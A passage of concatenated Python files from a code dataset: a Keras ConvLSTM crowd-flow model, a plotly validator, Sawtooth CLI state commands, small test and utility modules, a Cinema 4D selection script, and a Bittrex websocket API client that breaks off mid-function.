2021-09-07T09:29:43.000Z
|
2022-03-28T07:18:16.000Z
|
workBousaiOSA_baseline/predflowio/predflowio_PCRNB.py
|
deepkashiwa20/DeepCrowd
|
847bcc20ca36b521eead4ededa5d11b2fd2af30a
|
[
"MIT"
] | null | null | null |
workBousaiOSA_baseline/predflowio/predflowio_PCRNB.py
|
deepkashiwa20/DeepCrowd
|
847bcc20ca36b521eead4ededa5d11b2fd2af30a
|
[
"MIT"
] | 2
|
2021-06-18T01:28:16.000Z
|
2021-08-10T01:24:49.000Z
|
import sys
import shutil
import os
import time
from datetime import datetime, date, timedelta
import pandas as pd
import numpy as np
import h5py
from copy import copy
from keras.models import load_model, Model, Sequential
from keras.layers import Input, Activation, Flatten, Dense,Reshape, Concatenate, Add, Lambda, Layer, add, multiply
from keras.layers.convolutional_recurrent import ConvLSTM2D
from keras.layers.convolutional import Conv2D
from keras.callbacks import CSVLogger, EarlyStopping, ModelCheckpoint, LearningRateScheduler, Callback
import keras.backend as K
from Param import *
def getXSYS_CPT_D(mode, allData, trainData, dayinfo):
len_c, len_p, len_t = TIMESTEP, 1, 1
interval_p, interval_t = 1, 7
stepC = list(range(1, len_c + 1))
periods, trends = [interval_p * DAYTIMESTEP * i for i in range(1, len_p + 1)], \
[interval_t * DAYTIMESTEP * i for i in range(1, len_t + 1)]
stepP, stepT = [], []
for p in periods:
stepP.extend(list(range(p, p + len_c)))
for t in trends:
stepT.extend(list(range(t, t + len_c)))
depends = [stepC, stepP, stepT]
if mode == 'train':
start = max(len_c, interval_p * DAYTIMESTEP * len_p, interval_t * DAYTIMESTEP * len_t)
end = trainData.shape[0]
elif mode == 'test':
start = trainData.shape[0] + len_c
end = allData.shape[0]
else:
assert False, 'invalid mode...'
XC, XP, XT, YS, YD = [], [], [], [], []
for i in range(start, end):
x_c = [allData[i - j][np.newaxis, :, :, :] for j in depends[0]]
x_p = [allData[i - j][np.newaxis, :, :, :] for j in depends[1]]
x_t = [allData[i - j][np.newaxis, :, :, :] for j in depends[2]]
x_c = np.concatenate(x_c, axis=0)
x_p = np.concatenate(x_p, axis=0)
x_t = np.concatenate(x_t, axis=0)
x_c = x_c[::-1, :, :, :]
x_p = x_p[::-1, :, :, :]
x_t = x_t[::-1, :, :, :]
d = dayinfo[i]
y = allData[i]
XC.append(x_c)
XP.append(x_p)
XT.append(x_t)
YS.append(y)
YD.append(d)
XC, XP, XT, YS, YD = np.array(XC), np.array(XP), np.array(XT), np.array(YS), np.array(YD)
return XC, XP, XT, YS, YD
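# Illustration (hypothetical values, since TIMESTEP and DAYTIMESTEP come from Param.py):
# with TIMESTEP = 6 and DAYTIMESTEP = 48, each sample index i looks back at
#   stepC = [1..6]      (the six closest frames),
#   stepP = [48..53]    (the same window one day earlier, interval_p = 1), and
#   stepT = [336..341]  (the same window one week earlier, interval_t = 7),
# with each stack reversed so its frames run from oldest to newest.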
##################### PCRN Model ############################
def concat_28(ts):
lst = []
for i in range(14):
lst.append(K.concatenate([ts[:, 2*i,:,:,:], ts[:, 2*i+1,:,:,:]], axis = -1)) # First dimension - sample (batch_size)
return K.concatenate([i[:,np.newaxis,:,:,:] for i in lst], axis = 1) # output_shape needs to be specified when it differs from input_shape
def concat_14(ts):
lst = []
for i in range(7):
lst.append(K.concatenate([ts[:, 2*i,:,:,:], ts[:, 2*i+1,:,:,:]], axis = -1))
return K.concatenate([i[:,np.newaxis,:,:,:] for i in lst], axis = 1)
def ConvLSTMs():
model = Sequential()
model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True,
input_shape = (None, HEIGHT, WIDTH, CHANNEL)))
model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True))
model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = False))
return model
class Hadamard_fusion(Layer):
def __init__(self, **kwargs):
super(Hadamard_fusion, self).__init__(**kwargs)
def build(self, input_shape):
assert isinstance(input_shape, list)
self.Wc = self.add_weight(name='Wc', shape=(input_shape[0][1:]),
initializer='uniform', trainable=True)
self.Wp = self.add_weight(name='Wp', shape=(input_shape[1][1:]),
initializer='uniform', trainable=True)
super(Hadamard_fusion, self).build(input_shape)
def call(self, x, mask=None):
assert isinstance(x, list)
hct, hallt = x
hft = K.relu(hct*self.Wc + hallt*self.Wp)
return hft
def get_output_shape(self, input_shape):
return input_shape
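# Note added for clarity: Hadamard_fusion learns one weight tensor per input and fuses
# the closeness representation hct with the aggregated periodic representation hallt as
#   hft = relu(Wc * hct + Wp * hallt)
# where * is the element-wise (Hadamard) product, matching call() above.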
def getModel(x_dim, meta_dim):
# Input xc, xp, xt --> hct1, hP1, hP2
XC = Input(shape = x_dim)
XP = Input(shape = x_dim)
XT = Input(shape = x_dim)
shared_model = Sequential()
shared_model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True, input_shape = x_dim))
shared_model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True))
shared_model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = False))
hct = shared_model(XC)
hP1 = shared_model(XP)
hP2 = shared_model(XT)
# Weighting based fusion
# daily
concate1 = Concatenate()([hct, hP1])
conv1 = Conv2D(filters = 32, kernel_size = (1, 1), padding = 'same')(concate1)
# weekly
concate2 = Concatenate()([hct, hP2])
conv2 = Conv2D(filters = 32, kernel_size = (1, 1), padding = 'same')(concate2)
x1 = Lambda(lambda x: x[:,:,:,:,np.newaxis])(conv1)
x2 = Lambda(lambda x: x[:,:,:,:,np.newaxis])(conv2)
conv = Concatenate()([x1, x2])
a = Dense(2, activation='softmax')(conv)
ax = multiply([conv, a])
ax1 = Lambda(lambda x: x[:,:,:,:,0])(ax)
ax2 = Lambda(lambda x: x[:,:,:,:,1])(ax)
hPallt = add([ax1, ax2])
# hadamard fusion
hft = Hadamard_fusion()([hct, hPallt])
# transform shape
hft_reshap = Conv2D(filters = CHANNEL, kernel_size = (1, 1),
activation = 'relu', padding = 'same')(hft)
# metadata fusion
Xmeta = Input(shape = (meta_dim,))
dens1 = Dense(units = 10, activation = 'relu')(Xmeta)
dens2 = Dense(units = WIDTH*HEIGHT*CHANNEL, activation = 'relu')(dens1)
hmeta = Reshape((WIDTH, HEIGHT, CHANNEL))(dens2)
add2 = Add()([hft_reshap, hmeta])
X_hat = Activation('relu')(add2)
model = Model(inputs = [XC, XP, XT, Xmeta], outputs = X_hat)
return model
def testModel(name, allData, trainData, dayinfo):
print('Model Evaluation Started ...', time.ctime())
assert os.path.exists(PATH + '/' + name + '.h5'), 'model is not existing'
model = load_model(PATH + '/'+ name + '.h5', custom_objects={'Hadamard_fusion': Hadamard_fusion})
model.summary()
XC, XP, XT, YS, YD = getXSYS_CPT_D('test', allData, trainData, dayinfo)
print(XC.shape, XP.shape, XT.shape, YS.shape, YD.shape)
keras_score = model.evaluate(x=[XC, XP, XT, YD], y=YS, verbose=1)
rescale_MSE = keras_score * MAX_FLOWIO * MAX_FLOWIO
f = open(PATH + '/' + name + '_prediction_scores.txt', 'a')
f.write("Keras MSE on testData, %f\n" % keras_score)
f.write("Rescaled MSE on testData, %f\n" % rescale_MSE)
f.close()
print('*' * 40)
print('keras MSE', keras_score)
print('rescaled MSE', rescale_MSE)
print('Model Evaluation Ended ...', time.ctime())
pred = model.predict([XC, XP, XT, YD], verbose=1, batch_size=BATCHSIZE) * MAX_FLOWIO
groundtruth = YS * MAX_FLOWIO
np.save(PATH + '/' + MODELNAME + '_prediction.npy', pred)
np.save(PATH + '/' + MODELNAME + '_groundtruth.npy', groundtruth)
def trainModel(name, allData, trainData, dayinfo):
print('Model Training Started ...', time.ctime())
XC, XP, XT, YS, YD = getXSYS_CPT_D('train', allData, trainData, dayinfo)
print(XC.shape, XP.shape, XT.shape, YS.shape, YD.shape)
model = getModel((None, HEIGHT, WIDTH, CHANNEL), dayinfo.shape[1])
model.compile(loss=LOSS, optimizer=OPTIMIZER)
model.summary()
csv_logger = CSVLogger(PATH + '/' + name + '.log')
checkpointer = ModelCheckpoint(filepath=PATH + '/' + name + '.h5', verbose=1, save_best_only=True)
LR = LearningRateScheduler(lambda epoch: LEARN)
early_stopping = EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='auto')
model.fit(x=[XC, XP, XT, YD], y=YS, batch_size=BATCHSIZE, epochs=EPOCH, shuffle=True,
callbacks=[csv_logger, checkpointer, LR, early_stopping], validation_split=SPLIT)
keras_score = model.evaluate(x=[XC, XP, XT, YD], y=YS, verbose=1)
rescaled_MSE = keras_score * MAX_FLOWIO * MAX_FLOWIO
f = open(PATH + '/' + name + '_prediction_scores.txt', 'a')
f.write("Keras MSE on trainData, %f\n" % keras_score)
f.write("Rescaled MSE on trainData, %f\n" % rescaled_MSE)
f.close()
print('*' * 40)
print('keras MSE', keras_score)
print('rescaled MSE', rescaled_MSE)
print('Model Training Ended ...', time.ctime())
################# Parameter Setting #######################
MODELNAME = 'PCRNB'
KEYWORD = 'predflowio_' + MODELNAME + '_' + datetime.now().strftime("%y%m%d%H%M")
PATH = '../' + KEYWORD
################# Parameter Setting #######################
###########################Reproducible#############################
import random
np.random.seed(100)
random.seed(100)
os.environ['PYTHONHASHSEED'] = '0' # necessary for py3
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
tf.set_random_seed(100)
config = tf.ConfigProto(intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
config.gpu_options.per_process_gpu_memory_fraction = 0.3
config.gpu_options.visible_device_list = '1'
set_session(tf.Session(graph=tf.get_default_graph(), config=config))
###################################################################
def main():
if not os.path.exists(PATH):
os.makedirs(PATH)
currentPython = sys.argv[0]
shutil.copy2(currentPython, PATH)
shutil.copy2('Param.py', PATH)
data = np.load(dataFile)
data = data / MAX_FLOWIO
dayinfo = np.genfromtxt(dataPath + '/day_information_onehot.csv', delimiter=',', skip_header=1)
print('data.shape, dayinfo.shape', data.shape, dayinfo.shape)
train_Num = int(data.shape[0] * trainRatio)
print(KEYWORD, 'training started', time.ctime())
trainvalidateData = data[:train_Num, :, :, :]
print('trainvalidateData.shape', trainvalidateData.shape)
trainModel(MODELNAME, data, trainvalidateData, dayinfo)
print(KEYWORD, 'testing started', time.ctime())
testData = data[train_Num:, :, :, :]
print('testData.shape', testData.shape)
testModel(MODELNAME, data, trainvalidateData, dayinfo)
if __name__ == '__main__':
main()
| 38.977612
| 144
| 0.608367
|
565afb4674211785b6674fcefba571a818546b71
| 437
|
py
|
Python
|
env/Lib/site-packages/plotly/validators/mesh3d/_text.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
venv/Lib/site-packages/plotly/validators/mesh3d/_text.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
venv/Lib/site-packages/plotly/validators/mesh3d/_text.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class TextValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(self, plotly_name="text", parent_name="mesh3d", **kwargs):
super(TextValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs
)
| 33.615385
| 75
| 0.654462
|
b233487d2c9d4366fd73eb20689f90b8f8a283a2
| 4,743
|
py
|
Python
|
cli/sawtooth_cli/state.py
|
RomarQ/sawtooth-core
|
b900f4f3a2ffda9f6fb32a57fd4eacc41be86e5a
|
[
"Apache-2.0"
] | null | null | null |
cli/sawtooth_cli/state.py
|
RomarQ/sawtooth-core
|
b900f4f3a2ffda9f6fb32a57fd4eacc41be86e5a
|
[
"Apache-2.0"
] | null | null | null |
cli/sawtooth_cli/state.py
|
RomarQ/sawtooth-core
|
b900f4f3a2ffda9f6fb32a57fd4eacc41be86e5a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import argparse
from base64 import b64decode
from sawtooth_cli import format_utils as fmt
from sawtooth_cli.rest_client import RestClient
from sawtooth_cli.exceptions import CliException
from sawtooth_cli.parent_parsers import base_http_parser
from sawtooth_cli.parent_parsers import base_list_parser
def add_state_parser(subparsers, parent_parser):
"""Adds arguments parsers for the state list and state show commands
Args:
subparsers: Add parsers to this subparser object
parent_parser: The parent argparse.ArgumentParser object
"""
parser = subparsers.add_parser(
'state',
help='Displays information on the entries in state',
description='Provides subcommands to display information about the '
'state entries in the current blockchain state.')
grand_parsers = parser.add_subparsers(
title='subcommands',
dest='subcommand')
grand_parsers.required = True
list_parser = grand_parsers.add_parser(
'list',
description='Lists all state entries in the current blockchain.',
parents=[base_http_parser(), base_list_parser()],
formatter_class=argparse.RawDescriptionHelpFormatter)
list_parser.add_argument(
'subtree',
type=str,
nargs='?',
default=None,
help='address of a subtree to filter the list by')
list_parser.add_argument(
'--head',
action='store',
default=None,
help='specify the id of the block to set as the chain head')
show_parser = grand_parsers.add_parser(
'show',
description='Displays information for the specified state address in '
'the current blockchain.',
parents=[base_http_parser()],
formatter_class=argparse.RawDescriptionHelpFormatter)
show_parser.add_argument(
'address',
type=str,
help='address of the leaf')
show_parser.add_argument(
'--head',
action='store',
default=None,
help='specify the id of the block to set as the chain head')
def do_state(args):
"""Runs the batch list or batch show command, printing output to the
console
Args:
args: The parsed arguments sent to the command at runtime
"""
rest_client = RestClient(args.url, args.user)
if args.subcommand == 'list':
response = rest_client.list_state(args.subtree, args.head)
leaves = response['data']
head = response['head']
keys = ('address', 'size', 'data')
headers = tuple(k.upper() for k in keys)
def parse_leaf_row(leaf, decode=True):
decoded = b64decode(leaf['data'])
return (
leaf['address'],
len(decoded),
str(decoded) if decode else leaf['data'])
if args.format == 'default':
fmt.print_terminal_table(headers, leaves, parse_leaf_row)
print('HEAD BLOCK: "{}"'.format(head))
elif args.format == 'csv':
fmt.print_csv(headers, leaves, parse_leaf_row)
print('(data for head block: "{}")'.format(head))
elif args.format == 'json' or args.format == 'yaml':
state_data = {
'head': head,
'data': [dict(zip(keys, parse_leaf_row(l, False)))
for l in leaves]}
if args.format == 'yaml':
fmt.print_yaml(state_data)
elif args.format == 'json':
fmt.print_json(state_data)
else:
raise AssertionError('Missing handler: {}'.format(args.format))
else:
raise AssertionError('Missing handler: {}'.format(args.format))
if args.subcommand == 'show':
output = rest_client.get_leaf(args.address, args.head)
if output is not None:
print('DATA: "{}"'.format(b64decode(output['data'])))
print('HEAD: "{}"'.format(output['head']))
else:
raise CliException('No data available at {}'.format(args.address))
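# Example invocations (assuming the standard `sawtooth` CLI entry point; the REST API
# URL and state address are placeholders):
#   sawtooth state list --url http://rest-api:8008 --format json
#   sawtooth state show <state-address> --url http://rest-api:8008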
| 34.875
| 80
| 0.622602
|
9c4e5de475a980293124a0b784d2c7d5cddd8208
| 902
|
py
|
Python
|
security_monkey/common/gcp/error.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 4,258
|
2015-01-04T22:06:10.000Z
|
2022-03-31T23:40:27.000Z
|
security_monkey/common/gcp/error.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 1,013
|
2015-01-12T02:31:03.000Z
|
2021-09-16T19:09:03.000Z
|
security_monkey/common/gcp/error.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 965
|
2015-01-11T21:06:07.000Z
|
2022-03-17T16:53:57.000Z
|
# Copyright 2017 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.common.gcp.error
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Tom Melendez <supertom@google.com> @supertom
"""
class AuditIssue(object):
def __init__(self, code, notes=None):
self.code = code
self.notes = notes
| 31.103448
| 78
| 0.689579
|
f4cc7970deabec9a4ef78af780eca0d298c0bb5f
| 556
|
py
|
Python
|
functional_tests/prodigy/prodigy_connect.py
|
borisgrafx/client
|
c079f7816947a3092b500751eb920fda3866985f
|
[
"MIT"
] | 3,968
|
2017-08-23T21:27:19.000Z
|
2022-03-31T22:00:19.000Z
|
functional_tests/prodigy/prodigy_connect.py
|
borisgrafx/client
|
c079f7816947a3092b500751eb920fda3866985f
|
[
"MIT"
] | 2,725
|
2017-04-17T00:29:15.000Z
|
2022-03-31T21:01:53.000Z
|
functional_tests/prodigy/prodigy_connect.py
|
borisgrafx/client
|
c079f7816947a3092b500751eb920fda3866985f
|
[
"MIT"
] | 351
|
2018-04-08T19:39:34.000Z
|
2022-03-30T19:38:08.000Z
|
import json
# Monkey patch Prodigy dataset loading for testing
# Bypasses the requirement to maintain a local database for storing Prodigy files.
class Database:
    def get_dataset(self, dataset):
        # load sample dataset in JSON format
        file_name = dataset + ".json"
        with open('prodigy_test_resources/' + file_name) as f:
            data = json.load(f)
        return data
class Connect:
def connect(self):
# initialize sample database
database = Database()
return database
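# Usage sketch (hypothetical dataset name): patching Prodigy's database connection with
# this class makes get_dataset() read local JSON fixtures instead of a real database.
#   database = Connect().connect()
#   examples = database.get_dataset("sample")  # loads prodigy_test_resources/sample.json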
| 23.166667
| 84
| 0.647482
|
f2b54c23d46cee15ff4350d6c19a6c30d12d0047
| 1,115
|
py
|
Python
|
api_test/users/tests/test_forms.py
|
withyeah/cre
|
da1904fdb09aec1c9206ab2b3a8e34856df08b9a
|
[
"MIT"
] | null | null | null |
api_test/users/tests/test_forms.py
|
withyeah/cre
|
da1904fdb09aec1c9206ab2b3a8e34856df08b9a
|
[
"MIT"
] | 12
|
2020-06-05T23:55:17.000Z
|
2022-03-12T00:02:20.000Z
|
api_test/users/tests/test_forms.py
|
withyeah/cre
|
da1904fdb09aec1c9206ab2b3a8e34856df08b9a
|
[
"MIT"
] | null | null | null |
import pytest
from api_test.users.forms import UserCreationForm
from api_test.users.tests.factories import UserFactory
pytestmark = pytest.mark.django_db
class TestUserCreationForm:
def test_clean_username(self):
# A user with proto_user params does not exist yet.
proto_user = UserFactory.build()
form = UserCreationForm(
{
"username": proto_user.username,
"password1": proto_user._password,
"password2": proto_user._password,
}
)
assert form.is_valid()
assert form.clean_username() == proto_user.username
# Creating a user.
form.save()
# The user with proto_user params already exists,
# hence cannot be created.
form = UserCreationForm(
{
"username": proto_user.username,
"password1": proto_user._password,
"password2": proto_user._password,
}
)
assert not form.is_valid()
assert len(form.errors) == 1
assert "username" in form.errors
| 27.195122
| 59
| 0.593722
|
17a3145cecb9ddc873348a343919a42d9f48afeb
| 1,310
|
py
|
Python
|
third_party/NW Script Tools/Selection Tools/NW Select Previous Object in Manager.py
|
n1ckfg/C4DToolbox
|
3c23a83ee31e09c4faf0c05933fd491017f30aef
|
[
"MIT"
] | 9
|
2015-02-02T21:26:15.000Z
|
2021-05-21T01:38:21.000Z
|
third_party/NW Script Tools/Selection Tools/NW Select Previous Object in Manager.py
|
DreHit17/C4DToolbox
|
3c23a83ee31e09c4faf0c05933fd491017f30aef
|
[
"MIT"
] | null | null | null |
third_party/NW Script Tools/Selection Tools/NW Select Previous Object in Manager.py
|
DreHit17/C4DToolbox
|
3c23a83ee31e09c4faf0c05933fd491017f30aef
|
[
"MIT"
] | 2
|
2019-01-25T12:33:13.000Z
|
2021-05-21T01:42:48.000Z
|
import c4d # reference Cinema4D's existing library of code, called a "module"
def main(): # Define the main function of the script
ActiveObject = doc.GetActiveObject() # Define ActiveObject to look for the currently selected object in the manager
if ActiveObject == None: return # If there is no object selected, call it quits here
PrevObject = ActiveObject.GetPred() # Look for the previous object in the manager relative to the currently selected object
if PrevObject == None: return # If there is no previous object, call it quits here
doc.StartUndo() # Marks the beginning of a range of code that should be reversible
doc.AddUndo(c4d.UNDOTYPE_BITS, ActiveObject) # Make the following deselection of the active object reversible
ActiveObject.DelBit(c4d.BIT_ACTIVE) # Deselect the active object
doc.AddUndo(c4d.UNDOTYPE_BITS, PrevObject) # Make the following selection of the previous object reversible
PrevObject.SetBit(c4d.BIT_ACTIVE) # Make the previous object an active selection
doc.EndUndo() # Marks the end of a range of code that should be reversible
c4d.EventAdd() # Refresh the scene to update the change
if __name__=='__main__': # These two lines close out the main function. This is usually what will be used to end your script.
main()
| 68.947368
| 127
| 0.755725
|
96b58db3b2c0505d8c3d4806b289fe3bebe4e941
| 10,680
|
py
|
Python
|
aiobittrex/socket.py
|
ape364/aiobittrex
|
f35126664ced09f73905b89b20b0f24e508a2c47
|
[
"MIT"
] | null | null | null |
aiobittrex/socket.py
|
ape364/aiobittrex
|
f35126664ced09f73905b89b20b0f24e508a2c47
|
[
"MIT"
] | null | null | null |
aiobittrex/socket.py
|
ape364/aiobittrex
|
f35126664ced09f73905b89b20b0f24e508a2c47
|
[
"MIT"
] | null | null | null |
import asyncio
import hashlib
import hmac
import json
import logging
import time
from base64 import b64decode
from urllib.parse import urlencode
from zlib import decompress, error as zlib_error, MAX_WBITS
import aiohttp
from aiobittrex import BittrexSocketError, BittrexSocketConnectionClosed, BittrexSocketConnectionError
logger = logging.getLogger(__name__)
class BittrexSocket:
"""
https://bittrex.github.io/
"""
SOCKET_URL = 'https://socket.bittrex.com/signalr/'
SOCKET_HUB = 'c2'
KEYS = {
'A': 'ask',
'a': 'available',
'B': 'bid',
'b': 'balance',
'C': 'closed',
'c': 'currency',
'CI': 'cancel_initiated',
'D': 'deltas',
'd': 'delta',
'DT': 'order_delta_type',
'E': 'exchange',
'e': 'exchange_delta_type',
'F': 'fill_type',
'FI': 'fill_id',
'f': 'fills',
'G': 'open_buy_orders',
'g': 'open_sell_orders',
'H': 'high',
'h': 'auto_sell',
'I': 'id',
'i': 'is_open',
'J': 'condition',
'j': 'condition_target',
'K': 'immediate_or_cancel',
'k': 'is_conditional',
'L': 'low',
'l': 'last',
'M': 'market_name',
'm': 'base_volume',
'N': 'nonce',
'n': 'commission_paid',
'O': 'orders',
'o': 'order',
'OT': 'order_type',
'OU': 'order_uuid',
'P': 'price',
'p': 'crypto_address',
'PD': 'prev_day',
'PU': 'price_per_unit',
'Q': 'quantity',
'q': 'quantity_remaining',
'R': 'rate',
'r': 'requested',
'S': 'sells',
's': 'summaries',
'T': 'time_stamp',
't': 'total',
'TY': 'type',
'U': 'uuid',
'u': 'updated',
'V': 'volume',
'W': 'account_id',
'w': 'account_uuid',
'X': 'limit',
'x': 'created',
'Y': 'opened',
'y': 'state',
'Z': 'buys',
'z': 'pending'
}
def __init__(self, api_key=None, api_secret=None, loop=None):
self.api_key = api_key
self.api_secret = api_secret
self._socket_url = None
self._loop = loop or asyncio.get_event_loop()
self._session = aiohttp.ClientSession(loop=loop)
async def close(self):
await self._session.close()
@staticmethod
def _decode(message):
        try:
            # Bittrex sends raw deflate data without a zlib header
            deflated_msg = decompress(b64decode(message, validate=True), -MAX_WBITS)
        except zlib_error:
            # zlib.decompress signals failure with zlib.error (not SyntaxError);
            # fall back to the standard zlib container format
            deflated_msg = decompress(b64decode(message, validate=True))
return json.loads(deflated_msg.decode())
@classmethod
def replace_keys(cls, d):
if not isinstance(d, dict):
return d
result = {}
for key, value in d.items():
key = cls.KEYS.get(key, key)
if isinstance(value, dict):
result[key] = cls.replace_keys(value)
elif isinstance(value, list):
result[key] = [cls.replace_keys(v) for v in value]
else:
result[key] = value
return result
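    # For example, replace_keys({'M': 'BTC-ETH', 'N': 5}) returns
    # {'market_name': 'BTC-ETH', 'nonce': 5}; keys missing from KEYS pass through unchanged.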
async def _get_socket_url(self):
if self._socket_url is None:
conn_data = json.dumps([{'name': self.SOCKET_HUB}])
url = self.SOCKET_URL + 'negotiate' + '?' + urlencode({
'clientProtocol': '1.5',
'connectionData': conn_data,
'_': round(time.time() * 1000)
})
async with self._session.get(url) as r:
socket_conf = await r.json()
self._socket_url = self.SOCKET_URL.replace('https', 'wss') + 'connect' + '?' + urlencode({
'transport': 'webSockets',
'clientProtocol': socket_conf['ProtocolVersion'],
'connectionToken': socket_conf['ConnectionToken'],
'connectionData': conn_data,
'tid': 3
})
return self._socket_url
async def create_ws(self):
return await self._session.ws_connect(await self._get_socket_url())
async def _listen(self, endpoint, messages, ws=None):
ws = ws or await self.create_ws()
for n, m in enumerate(messages, start=1):
await ws.send_str(json.dumps({
'H': self.SOCKET_HUB,
'M': endpoint,
'A': m,
'I': n
}))
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
decoded_message = json.loads(msg.data)
if 'E' in decoded_message:
raise BittrexSocketError(decoded_message['E'])
yield decoded_message
elif msg.type == aiohttp.WSMsgType.closed:
logger.warning('Websocket connection closed: %s', msg)
raise BittrexSocketConnectionClosed
elif msg.type == aiohttp.WSMsgType.error:
logger.error('Websocket connection error: %s', msg)
raise BittrexSocketConnectionError
else:
logger.warning("Message: {}".format(msg.type))
async def _get_auth_context(self, ws):
async for m in self._listen(endpoint='GetAuthContext', messages=[[self.api_key]], ws=ws):
if 'R' in m:
return m['R']
async def listen_account(self, ws=None):
"""
Listen to account balance and orders updates.
callbacks:
uB - balance delta
uO - order delta
"""
challenge = await self._get_auth_context(ws)
signature = hmac.new(
key=self.api_secret.encode(),
msg=challenge.encode(),
digestmod=hashlib.sha512
).hexdigest()
async for m in self._listen(endpoint='Authenticate', messages=[[self.api_key, signature]], ws=ws):
if 'R' in m:
assert m['R']
for row in m.get('M') or []:
if row['M'] not in ('uB', 'uO'):
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
async def get_market(self, markets):
"""
{
"BTC-TRX": {
"market_name": null,
"nonce": 11333,
"buys": [{
"quantity": 428996.57288094,
"rate": 8.65e-06
}],
"sells": [{
"quantity": 91814.92314615,
"rate": 8.66e-06
}],
"fills": [{
"id": 5020055,
"time_stamp": 1524904823903,
"quantity": 34413.0,
"price": 8.66e-06,
"total": 0.29801658,
"fill_type": "FILL",
"order_type": "BUY"
}]
}
}
"""
result = {}
async for m in self._listen(endpoint='QueryExchangeState', messages=[[m] for m in markets]):
if 'R' not in m:
continue
i = int(m['I'])
result[markets[i - 1]] = self.replace_keys(self._decode(m['R']))
if len(result) >= len(markets):
break
return result
async def listen_market(self, markets, ws=None):
"""
Listen to market updates.
callbacks:
- uE - market delta
{
"market_name": "BTC-TRX",
"nonce": 11919,
"buys": [],
"sells": [{
"type": 2,
"rate": 8.7e-06,
"quantity": 197473.52148216
}],
"fills": [{
"order_type": "BUY",
"rate": 8.7e-06,
"quantity": 28376.84449489,
"time_stamp": 1524905878547
}]
}
"""
async for m in self._listen(endpoint='SubscribeToExchangeDeltas', messages=[[m] for m in markets], ws=ws):
for row in m.get('M') or []:
if row['M'] != 'uE':
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
async def get_summary(self):
"""
{
"nonce": 5108,
"summaries": [{
"market_name": "BTC-ADA",
"high": 3.388e-05,
"low": 3.116e-05,
"volume": 45482116.6444527,
"last": 3.337e-05,
"base_volume": 1481.80378307,
"time_stamp": 1524907023543,
"bid": 3.333e-05,
"ask": 3.337e-05,
"open_buy_orders": 5195,
"open_sell_orders": 15219,
"prev_day": 3.118e-05,
"created": 1506668518873
}]
}
"""
async for m in self._listen(endpoint='QuerySummaryState', messages=['']):
if 'R' in m:
return self.replace_keys(self._decode(m['R']))
async def listen_summary_light(self, ws=None):
"""
callbacks:
- uL - light summary delta
{
"deltas": [{
"market_name": "BTC-ADT",
"last": 7.37e-06,
"base_volume": 118.05
}]
}
"""
async for m in self._listen(endpoint='SubscribeToSummaryLiteDeltas', messages=[''], ws=ws):
for row in m.get('M') or []:
if row['M'] != 'uL':
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
async def listen_summary(self, ws=None):
"""
callbacks:
- uS - summary delta
{
"nonce": 5069,
"deltas": [{
"market_name": "BTC-ETH",
"high": 0.07371794,
"low": 0.071695,
"volume": 9535.44197173,
"last": 0.07318011,
"base_volume": 695.21677418,
"time_stamp": 1524907827823,
"bid": 0.07318011,
"ask": 0.07346991,
"open_buy_orders": 4428,
"open_sell_orders": 3860,
"prev_day": 0.07188519,
"created": 1439542944817
}]
}
"""
async for m in self._listen(endpoint='SubscribeToSummaryDeltas', messages=[''], ws=ws):
for row in m.get('M') or []:
if row['M'] != 'uS':
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
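# Minimal usage sketch (not part of the original module): stream market deltas for a
# couple of markets, then close the underlying aiohttp session. The market names and
# the helper name are illustrative only.
async def _example_watch_markets():
    socket = BittrexSocket()
    try:
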